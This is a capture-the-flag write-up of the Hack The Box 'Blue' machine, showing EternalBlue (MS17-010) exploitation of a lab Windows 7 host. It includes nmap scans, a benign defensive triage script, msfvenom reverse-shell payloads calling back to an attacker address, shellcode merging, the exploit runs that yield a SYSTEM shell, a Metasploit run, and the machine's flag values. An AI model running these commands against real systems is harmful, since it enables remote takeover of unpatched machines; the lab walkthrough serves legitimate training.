Enumeration
We start our scan using nmap:
root@kali:~/HTB-Windows/Blue# nmap -sV -sC -A -oN nmap/initial 10.10.10.40
Starting Nmap 7.80 ( https://nmap.org ) at 2020-06-21 16:08 EDT
Nmap scan report for 10.10.10.40
Host is up (0.20s latency).
Not shown: 991 closed ports
PORT STATE SERVICE VERSION
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Windows 7 Professional 7601 Service Pack 1 microsoft-ds (workgroup: WORKGROUP)
49152/tcp open msrpc Microsoft Windows RPC
49153/tcp open msrpc Microsoft Windows RPC
49154/tcp open msrpc Microsoft Windows RPC
49155/tcp open msrpc Microsoft Windows RPC
49156/tcp open msrpc Microsoft Windows RPC
49157/tcp open msrpc Microsoft Windows RPC
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
Network Distance: 2 hops
Service Info: Host: HARIS-PC; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: mean: -16m32s, deviation: 34m36s, median: 3m26s
| smb-os-discovery:
| OS: Windows 7 Professional 7601 Service Pack 1 (Windows 7 Professional 6.1)
| OS CPE: cpe:/o:microsoft:windows_7::sp1:professional
| Computer name: haris-PC
| NetBIOS computer name: HARIS-PC\x00
| Workgroup: WORKGROUP\x00
|_ System time: 2020-06-21T21:13:32+01:00
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb2-security-mode:
| 2.02:
|_ Message signing enabled but not required
| smb2-time:
| date: 2020-06-21T20:13:33
|_ start_date: 2020-06-21T20:09:10
TRACEROUTE (using port 443/tcp)
HOP RTT ADDRESS
1 207.65 ms 10.10.14.1
2 208.13 ms 10.10.10.40
We obtained important information about our target:
OS: Windows 7 Professional 7601 Service Pack 1 (Windows 7 Professional 6.1)
Computer name: HARIS-PC
With this information we could already start researching vulnerabilities for Windows 7; as we know, it has been discontinued (Windows 7 support ended on January 14, 2020) and there are several exploits for this OS.
Reference: https://support.microsoft.com/pt-br/help/4057281/windows-7-support-ended-on-january-14-2020
Continuing with nmap, we can use the nmap scripts again to search for vulnerabilities:
root@kali:~/HTB-Windows/Blue# nmap -p135,139,445,49152,49153,49154,49155,49156,49157 --script vuln -oN nmap/vulns 10.10.10.40
Starting Nmap 7.80 ( https://nmap.org ) at 2020-06-21 17:38 EDT
Nmap scan report for 10.10.10.40
Host is up (0.21s latency).
PORT STATE SERVICE
135/tcp open msrpc
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
139/tcp open netbios-ssn
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
445/tcp open microsoft-ds
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
49152/tcp open unknown
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
49153/tcp open unknown
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
49154/tcp open unknown
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
49155/tcp open unknown
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
49156/tcp open unknown
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
49157/tcp open unknown
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
Host script results:
|_smb-vuln-ms10-054: false
|_smb-vuln-ms10-061: NT_STATUS_OBJECT_NAME_NOT_FOUND
| smb-vuln-ms17-010:
| VULNERABLE:
| Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)
| State: VULNERABLE
| IDs: CVE:CVE-2017-0143
| Risk factor: HIGH
| A critical remote code execution vulnerability exists in Microsoft SMBv1
| servers (ms17-010).
|
| Disclosure date: 2017-03-14
| References:
| https://technet.microsoft.com/en-us/library/security/ms17-010.aspx
| https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143
|_ https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/
Nmap done: 1 IP address (1 host up) scanned in 113.60 seconds
According to the output we have smb-vuln-ms17-010, so we need to test it and see whether the host really is vulnerable.
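As an added example (not part of the original writeup), the following Python script triages the nmap host-script output above the way a defender would, flagging the three findings that make this host an easy target: an end-of-life OS, SMB signing not enforced, and an unpatched MS17-010. The sample output it parses is constructed from the scans shown above; the severity labels are my own assumption.

```python
"""Triage nmap SMB host-script output: EOL OS, SMB signing not enforced, smb-vuln-ms17-010 VULNERABLE."""
import re

# Constructed sample, condensed from the two nmap runs above.
SAMPLE_NMAP_OUTPUT = """\
Nmap scan report for 10.10.10.40
Host script results:
| smb-os-discovery:
|   OS: Windows 7 Professional 7601 Service Pack 1 (Windows 7 Professional 6.1)
| smb-security-mode:
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode:
|_    Message signing enabled but not required
| smb-vuln-ms17-010:
|   VULNERABLE:
|     State: VULNERABLE
|     IDs:  CVE:CVE-2017-0143
"""

# Builds that no longer receive security updates (Windows 7 EOL 2020-01-14).
EOL_OS_PATTERNS = (r"\bWindows 7\b", r"\bWindows XP\b", r"\bWindows Server 2008\b")
SCRIPT_HEADER = re.compile(r"^\|_? ([a-z][\w-]*):\s*$")  # e.g. "| smb-os-discovery:"
NSE_PREFIX = re.compile(r"^\|_?\s*")                      # strips "| " / "|_  "


def triage_smb(nmap_output):
    """Parse one host's nmap output into {'host', 'os', 'findings'};
    each finding is a (severity, script, message) tuple."""
    result = {"host": None, "os": None, "findings": []}
    ms17 = {"state": None, "cves": []}
    script = None
    for raw in nmap_output.splitlines():
        if raw.startswith("Nmap scan report for "):
            result["host"] = raw.split()[-1]
            continue
        m = SCRIPT_HEADER.match(raw)
        if m:
            script = m.group(1)
            continue
        if not raw.startswith("|"):
            script = None  # left the host-script block
            continue
        line = NSE_PREFIX.sub("", raw).strip()
        if script == "smb-os-discovery" and line.startswith("OS:"):
            result["os"] = line[3:].strip()
            if any(re.search(p, result["os"]) for p in EOL_OS_PATTERNS):
                result["findings"].append(("HIGH", script, "end-of-life OS: " + result["os"]))
        elif script == "smb-security-mode" and line.startswith("message_signing: disabled"):
            result["findings"].append(("MEDIUM", script, "SMB1 message signing disabled"))
        elif script == "smb2-security-mode" and "not required" in line:
            result["findings"].append(("MEDIUM", script, "SMB2 message signing not required"))
        elif script == "smb-vuln-ms17-010" and line.startswith("State:"):
            ms17["state"] = line.split(":", 1)[1].strip()
        elif script == "smb-vuln-ms17-010" and line.startswith("IDs:"):
            ms17["cves"] = re.findall(r"CVE-\d{4}-\d+", line)
    if ms17["state"] == "VULNERABLE":  # the verdict line, not the bare CVE id, decides
        result["findings"].append(("CRITICAL", "smb-vuln-ms17-010",
                                   "unpatched MS17-010: " + ", ".join(ms17["cves"])))
    return result
```

Feed it the saved `nmap/vulns` file to get the same four findings this host produces; a patched, signing-enforced host yields an empty findings list.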
Find exploits
A quick search finds several exploits for the vulnerability found:
root@kali:~/HTB-Windows/Blue# searchsploit ms17-010
----------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Exploit Title | Path
----------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Microsoft Windows - 'EternalRomance'/'EternalSynergy'/'EternalChampion' SMB Remote Code Execution (Metasploit) (MS17-010) | windows/remote/43970.rb
Microsoft Windows - SMB Remote Code Execution Scanner (MS17-010) (Metasploit) | windows/dos/41891.rb
Microsoft Windows 7/2008 R2 - 'EternalBlue' SMB Remote Code Execution (MS17-010) | windows/remote/42031.py
Microsoft Windows 7/8.1/2008 R2/2012 R2/2016 R2 - 'EternalBlue' SMB Remote Code Execution (MS17-010) | windows/remote/42315.py
Microsoft Windows 8/8.1/2012 R2 (x64) - 'EternalBlue' SMB Remote Code Execution (MS17-010) | windows_x86-64/remote/42030.py
Microsoft Windows Server 2008 R2 (x64) - 'SrvOs2FeaToNt' SMB Remote Code Execution (MS17-010) | windows_x86-64/remote/41987.py
----------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results
Manual mode without Metasploit
We will use one of the exploits found, written in Python. We copy it into the exploit directory we created:
root@kali:~/HTB-Windows/Blue# mkdir exploit
root@kali:~/HTB-Windows/Blue# cd exploit/
root@kali:~/HTB-Windows/Blue/exploit# searchsploit -m windows/remote/42315.py
Exploit: Microsoft Windows 7/8.1/2008 R2/2012 R2/2016 R2 - 'EternalBlue' SMB Remote Code Execution (MS17-010)
URL: https://www.exploit-db.com/exploits/42315
Path: /usr/share/exploitdb/exploits/windows/remote/42315.py
File Type: Python script, ASCII text executable, with CRLF line terminators
Copied to: /root/HTB-Windows/Blue/exploit/42315.py
Before running any code on your machine, it is advisable to read it first.
root@kali:~/HTB-Windows/Blue/exploit# ls
42315.py
root@kali:~/HTB-Windows/Blue/exploit# vim 42315.py
root@kali:~/HTB-Windows/Blue/exploit# python 42315.py
Traceback (most recent call last):
File "42315.py", line 3, in <module>
from mysmb import MYSMB
ImportError: No module named mysmb
Note that the mysmb module is missing. If you read the code you will see a link where you can download it, and if it weren't there a quick Google search would solve the problem.
Download link: https://raw.githubusercontent.com/worawit/MS17-010/master/mysmb.py
root@kali:~/HTB-Windows/Blue/exploit# wget https://raw.githubusercontent.com/worawit/MS17-010/master/mysmb.py -O mysmb.py
--2020-06-21 17:58:10-- https://raw.githubusercontent.com/worawit/MS17-010/master/mysmb.py
Resolving raw.githubusercontent.com (raw.githubusercontent.com)... 151.101.204.133
Connecting to raw.githubusercontent.com (raw.githubusercontent.com)|151.101.204.133|:443... connected.
HTTP request sent, awaiting response... 200 OK
Length: 16669 (16K) [text/plain]
Saving to: ‘mysmb.py’
mysmb.py 100%[=======================================================================================>] 16.28K --.-KB/s in 0.1s
2020-06-21 17:58:11 (160 KB/s) - ‘mysmb.py’ saved [16669/16669]
After downloading it into the same directory as our exploit, we can run it:
root@kali:~/HTB-Windows/Blue/exploit# python
42315.py mysmb.py
root@kali:~/HTB-Windows/Blue/exploit# python 42315.py
42315.py <ip> [pipe_name]
root@kali:~/HTB-Windows/Blue/exploit#
Note that we need a pipe_name, so using another script we can quickly get what we need.
Reference: https://github.com/worawit/MS17-010/blob/master/checker.py
root@kali:~/HTB-Windows/Blue/exploit# wget https://raw.githubusercontent.com/worawit/MS17-010/master/checker.py -O checker.py
--2020-06-21 18:14:53-- https://raw.githubusercontent.com/worawit/MS17-010/master/checker.py
Resolving raw.githubusercontent.com (raw.githubusercontent.com)... 151.101.208.133
Connecting to raw.githubusercontent.com (raw.githubusercontent.com)|151.101.208.133|:443... connected.
HTTP request sent, awaiting response... 200 OK
Length: 2495 (2.4K) [text/plain]
Saving to: ‘checker.py’
checker.py 100%[=======================================================================================>] 2.44K --.-KB/s in 0.006s
2020-06-21 18:14:53 (395 KB/s) - ‘checker.py’ saved [2495/2495]
Then we run it:
root@kali:~/HTB-Windows/Blue/exploit# python checker.py
checker.py <ip>
root@kali:~/HTB-Windows/Blue/exploit# python checker.py 10.10.10.40
Target OS: Windows 7 Professional 7601 Service Pack 1
The target is not patched
=== Testing named pipes ===
spoolss: STATUS_ACCESS_DENIED
samr: STATUS_ACCESS_DENIED
netlogon: STATUS_ACCESS_DENIED
lsarpc: STATUS_ACCESS_DENIED
browser: STATUS_ACCESS_DENIED
Well, it was not possible to find a pipe we have access to. We'll move on to another approach. I found a nice site that teaches how to do it manually.
Reference: https://root4loot.com/post/eternalblue_manual_exploit/
x64 payload:
1 - Assemble kernel shellcode with nasm:
root@kali:~/HTB-Windows/Blue# ls
42315.py exploit MS17-010 nmap report.ctb report.ctb~
root@kali:~/HTB-Windows/Blue# nasm -f bin MS17-010/shellcode/eternalblue_kshellcode_x64.asm -o ./sc_x64_kernel.bin
root@kali:~/HTB-Windows/Blue# ls
42315.py exploit MS17-010 nmap report.ctb report.ctb~ sc_x64_kernel.bin
2 - Generate a binary payload or use an existing one. Name this sc_x64_payload.bin:
root@kali:~/HTB-Windows/Blue# ls
42315.py exploit MS17-010 nmap report.ctb report.ctb~ sc_x64_kernel.bin
root@kali:~/HTB-Windows/Blue# msfvenom -p windows/x64/shell_reverse_tcp LPORT=443 LHOST=10.10.14.36 --platform windows -a x64 --format raw -o sc_x64_payload.bin
No encoder specified, outputting raw payload
Payload size: 460 bytes
Saved as: sc_x64_payload.bin
root@kali:~/HTB-Windows/Blue# ls
42315.py exploit MS17-010 nmap report.ctb report.ctb~ sc_x64_kernel.bin sc_x64_payload.bin
3 - Concatenate kernel shellcode & payload:
root@kali:~/HTB-Windows/Blue# cat sc_x64_kernel.bin sc_x64_payload.bin > sc_x64.bin
root@kali:~/HTB-Windows/Blue# ls
42315.py exploit MS17-010 nmap report.ctb report.ctb~ sc_x64.bin sc_x64_kernel.bin sc_x64_payload.bin
x86 shellcode:
1 - Assemble kernel shellcode with nasm:
root@kali:~/HTB-Windows/Blue# ls
42315.py exploit MS17-010 nmap report.ctb report.ctb~ sc_x64.bin sc_x64_kernel.bin sc_x64_payload.bin
root@kali:~/HTB-Windows/Blue# nasm -f bin MS17-010/shellcode/eternalblue_kshellcode_x86.asm -o ./sc_x86_kernel.bin
root@kali:~/HTB-Windows/Blue# ls
42315.py exploit MS17-010 nmap report.ctb report.ctb~ sc_x64.bin sc_x64_kernel.bin sc_x64_payload.bin sc_x86_kernel.bin
2 - Generate a binary payload or use an existing one. Name this sc_x86_payload.bin:
root@kali:~/HTB-Windows/Blue# msfvenom -p windows/shell_reverse_tcp LPORT=443 LHOST=10.10.14.36 --platform windows -a x86 --format raw -o sc_x86_payload.bin
No encoder specified, outputting raw payload
Payload size: 324 bytes
Saved as: sc_x86_payload.bin
root@kali:~/HTB-Windows/Blue# ls
42315.py exploit MS17-010 nmap report.ctb report.ctb~ sc_x64.bin sc_x64_kernel.bin sc_x64_payload.bin sc_x86_kernel.bin sc_x86_payload.bin
3 - Concatenate kernel shellcode & payload:
root@kali:~/HTB-Windows/Blue# cat sc_x86_kernel.bin sc_x86_payload.bin > sc_x86.bin
root@kali:~/HTB-Windows/Blue# ls
42315.py exploit MS17-010 nmap report.ctb report.ctb~ sc_x64.bin sc_x64_kernel.bin sc_x64_payload.bin sc_x86.bin sc_x86_kernel.bin sc_x86_payload.bin
Merging binaries
root@kali:~/HTB-Windows/Blue# python MS17-010/shellcode/eternalblue_sc_merge.py sc_x86.bin sc_x64.bin sc_all.bin
root@kali:~/HTB-Windows/Blue# ls
42315.py MS17-010 report.ctb sc_all.bin sc_x64_kernel.bin sc_x86.bin sc_x86_payload.bin
exploit nmap report.ctb~ sc_x64.bin sc_x64_payload.bin sc_x86_kernel.bin
Start a listener on port 443 using nc:
root@kali:~/HTB-Windows# rlwrap nc -nlvp 443
listening on [any] 443 ...
Run the exploit:
root@kali:~/HTB-Windows/Blue# python MS17-010/eternalblue_exploit7.py 10.10.10.40 sc_all.bin
shellcode size: 2203
numGroomConn: 13
Target OS: Windows 7 Professional 7601 Service Pack 1
SMB1 session setup allocate nonpaged pool success
SMB1 session setup allocate nonpaged pool success
good response status: INVALID_PARAMETER
done
No success. HMMMMM. I'll reset the machine and try running the exploit again.
root@kali:~/HTB-Windows/Blue# python MS17-010/eternalblue_exploit7.py 10.10.10.40 sc_all.bin
shellcode size: 2203
numGroomConn: 13
Target OS: Windows 7 Professional 7601 Service Pack 1
SMB1 session setup allocate nonpaged pool success
SMB1 session setup allocate nonpaged pool success
good response status: INVALID_PARAMETER
done
OK, no success again. I noticed it was always giving the same INVALID_PARAMETER error, and that was exactly what was going wrong: numGroomConn was being set automatically to 13, so I set it to 40.
root@kali:~/HTB-Windows/Blue# python MS17-010/eternalblue_exploit7.py 10.10.10.40 sc_all.bin 40
shellcode size: 2203
numGroomConn: 40
Target OS: Windows 7 Professional 7601 Service Pack 1
SMB1 session setup allocate nonpaged pool success
SMB1 session setup allocate nonpaged pool success
good response status: INVALID_PARAMETER
done
After that, I got the SYSTEM shell:
root@kali:~/HTB-Windows# rlwrap nc -nlvp 443
listening on [any] 443 ...
connect to [10.10.14.36] from (UNKNOWN) [10.10.10.40] 49158
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.
C:\Windows\system32>whoami
whoami
nt authority\system
C:\Windows\system32>ipconfig
ipconfig
Windows IP Configuration
Ethernet adapter Local Area Connection:
Connection-specific DNS Suffix . :
IPv6 Address. . . . . . . . . . . : dead:beef::a4bc:2080:13c6:d070
Temporary IPv6 Address. . . . . . : dead:beef::a07f:4782:a508:7064
Link-local IPv6 Address . . . . . : fe80::a4bc:2080:13c6:d070%11
IPv4 Address. . . . . . . . . . . : 10.10.10.40
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . : fe80::250:56ff:feb9:c0c3%11
10.10.10.2
Tunnel adapter isatap.{CBC67B8A-5031-412C-AEA7-B3186D30360E}:
Media State . . . . . . . . . . . : Media disconnected
Connection-specific DNS Suffix . :
Tunnel adapter Teredo Tunneling Pseudo-Interface:
Media State . . . . . . . . . . . : Media disconnected
Connection-specific DNS Suffix . :
C:\Windows\system32>
ROOT AND USER FLAGS:
C:\Users\Administrator\Desktop>type root.txt
type root.txt
ff548eb71e920ff6c08843ce9df4e717
C:\Users\Administrator\Desktop>
c:\Users\haris\Desktop>type user.txt
type user.txt
4c546aea7dbee75cbd71de245c8deea9
c:\Users\haris\Desktop>
Method 2 with Metasploit
Open your msfconsole and search for ms17_010:
msf5 exploit(windows/smb/ms17_010_eternalblue) >
msf5 exploit(windows/smb/ms17_010_eternalblue) > show options
Module options (exploit/windows/smb/ms17_010_eternalblue):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOSTS yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
RPORT 445 yes The target port (TCP)
SMBDomain . no (Optional) The Windows domain to use for authentication
SMBPass no (Optional) The password for the specified username
SMBUser no (Optional) The username to authenticate as
VERIFY_ARCH true yes Check if remote architecture matches exploit Target.
VERIFY_TARGET true yes Check if remote OS matches exploit Target.
Exploit target:
Id Name
-- ----
0 Windows 7 and Server 2008 R2 (x64) All Service Packs
msf5 exploit(windows/smb/ms17_010_eternalblue) > set rhosts 10.10.10.40
rhosts => 10.10.10.40
And we run it:
msf5 exploit(windows/smb/ms17_010_eternalblue) > run
[*] Started reverse TCP handler on 10.10.14.36:4444
[*] 10.10.10.40:445 - Using auxiliary/scanner/smb/smb_ms17_010 as check
[+] 10.10.10.40:445 - Host is likely VULNERABLE to MS17-010! - Windows 7 Professional 7601 Service Pack 1 x64 (64-bit)
[*] 10.10.10.40:445 - Scanned 1 of 1 hosts (100% complete)
[*] 10.10.10.40:445 - Connecting to target for exploitation.
[+] 10.10.10.40:445 - Connection established for exploitation.
[+] 10.10.10.40:445 - Target OS selected valid for OS indicated by SMB reply
[*] 10.10.10.40:445 - CORE raw buffer dump (42 bytes)
[*] 10.10.10.40:445 - 0x00000000 57 69 6e 64 6f 77 73 20 37 20 50 72 6f 66 65 73 Windows 7 Profes
[*] 10.10.10.40:445 - 0x00000010 73 69 6f 6e 61 6c 20 37 36 30 31 20 53 65 72 76 sional 7601 Serv
[*] 10.10.10.40:445 - 0x00000020 69 63 65 20 50 61 63 6b 20 31 ice Pack 1
[+] 10.10.10.40:445 - Target arch selected valid for arch indicated by DCE/RPC reply
[*] 10.10.10.40:445 - Trying exploit with 12 Groom Allocations.
[*] 10.10.10.40:445 - Sending all but last fragment of exploit packet
[*] 10.10.10.40:445 - Starting non-paged pool grooming
[+] 10.10.10.40:445 - Sending SMBv2 buffers
[+] 10.10.10.40:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.
[*] 10.10.10.40:445 - Sending final SMBv2 buffers.
[*] 10.10.10.40:445 - Sending last fragment of exploit packet!
[*] 10.10.10.40:445 - Receiving response from exploit packet
[+] 10.10.10.40:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)!
[*] 10.10.10.40:445 - Sending egg to corrupted connection.
[*] 10.10.10.40:445 - Triggering free of corrupted buffer.
[*] Command shell session 1 opened (10.10.14.36:4444 -> 10.10.10.40:49159) at 2020-06-21 19:08:17 -0400
[+] 10.10.10.40:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 10.10.10.40:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-WIN-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 10.10.10.40:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
Copyright (c) 2009 Microsoft Corporation. All rights reserved.
C:\Windows\system32>whoami
whoami
nt authority\system
C:\Windows\system32>
We quickly have SYSTEM!
Draft (command summary)
nasm -f bin MS17-010/shellcode/eternalblue_kshellcode_x64.asm -o ./sc_x64_kernel.bin
msfvenom -p windows/x64/shell_reverse_tcp LPORT=443 LHOST=10.10.14.36 --platform windows -a x64 --format raw -o sc_x64_payload.bin
cat sc_x64_kernel.bin sc_x64_payload.bin > sc_x64.bin
nasm -f bin MS17-010/shellcode/eternalblue_kshellcode_x86.asm -o ./sc_x86_kernel.bin
msfvenom -p windows/shell_reverse_tcp LPORT=443 LHOST=10.10.14.36 --platform windows -a x86 --format raw -o sc_x86_payload.bin
cat sc_x86_kernel.bin sc_x86_payload.bin > sc_x86.bin
python MS17-010/shellcode/eternalblue_sc_merge.py sc_x86.bin sc_x64.bin sc_all.bin
python MS17-010/eternalblue_exploit7.py 10.10.10.40 sc_all.bin 40